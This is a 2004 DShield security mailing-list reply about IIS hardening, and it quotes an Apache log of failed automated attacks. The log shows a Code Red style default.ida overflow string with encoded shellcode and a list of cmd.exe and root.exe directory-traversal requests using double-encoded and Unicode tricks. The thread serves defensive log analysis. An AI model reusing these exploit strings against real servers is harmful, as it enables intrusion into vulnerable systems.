[Dshield] Look at this Nitwit

Al Reust areust at comcast.net
Thu Jan 29 05:17:59 GMT 2004


Hehehehe

This is very similar to quite a few logs that I have seen on a few web 
servers whose logs are private. It normally starts with the Code Red and 
then a list of "favorite" exploits. I hate to say it, But I started calling 
them "Script Kiddies in a Box." The similarities from various IP's that do 
not appear to be spoofed tends to tell me that there are couple "script 
kiddies" that are implying a "moderately" protected IIS box could be 
toppled by this sequences of exploits. So it appears that one individual 
that was "moderately" successful and may have written a web page with my 
10-20 top favorite exploits and then provided access to the tool and 
readily modifiable sequence of scripts.

What most "starting" IIS Admins do not know is what various script mappings 
"do.." or what is removed by the IIS lockdown tool and URLscan. The URL 
below is a good starting place for beginners, those inquiring minds..

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/columns/insider/iisi0603.asp

In most cases the experienced IIS admin removed the "unwanted/unnecessary" 
mappings and provided additional security through "rights" and 
"authorization" (as a NIX admin would say fixed the 777 or NT admin turned 
Off the "everyone" access. Turned off unwanted or undesired "services," to 
further enhance the security/stability of the box...  and then took time to 
write custom ISAPI filters that preform some of the same functions as the 
URL scan.

At times looking at some the questions, I see a lot of people that are only 
Nix Side or NT Side and few that have worked or have to work both 
sides.  As the phrasing of the question "happens" and less the statement 
about the OS/Server. Every presumes from their point of view. So if You are 
new, please take a moment to identify type of web server (Apache, IIS, 
etc.) most of the people that offer help will then decide as to whether to 
answer (or just chuckle and then answer). Someone will answer, but it may 
not have been the person you needed.

As Johannes stated:
If OS=Nix/Apache
         then  sit back and watch the fun.
Else, watch very closely.

Al

At 03:42 PM 1/28/2004 -0500, you wrote:
>Apache log:
>
>pcp03063113pcs.newlaf01.mi.comcast.net - - [28/Jan/2004:07:51:32 -0500]
>"GET
>/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
>HTTP/1.0" 404 987 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:26 -0500]
>"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:27 -0500]
>"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:27 -0500]
>"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:28 -0500]
>"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:28 -0500]
>"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973
>"-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:28 -0500]
>"GET
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:28 -0500]
>"GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:29 -0500]
>"GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:29 -0500]
>"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973
>"-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:29 -0500]
>"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973
>"-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:29 -0500]
>"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973
>"-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:30 -0500]
>"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973
>"-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:30 -0500]
>"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400
>906 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:30 -0500]
>"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 906
>"-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:31 -0500]
>"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
>973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:31 -0500]
>"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973
>"-" "-"
>
>                                ---------
>             Quality Management - A Commitment to Excellence
>
>_______________________________________________
>list mailing list
>list at dshield.org
>To change your subscription options (or unsubscribe), see: 
>http://www.dshield.org/mailman/listinfo/list




More information about the list mailing list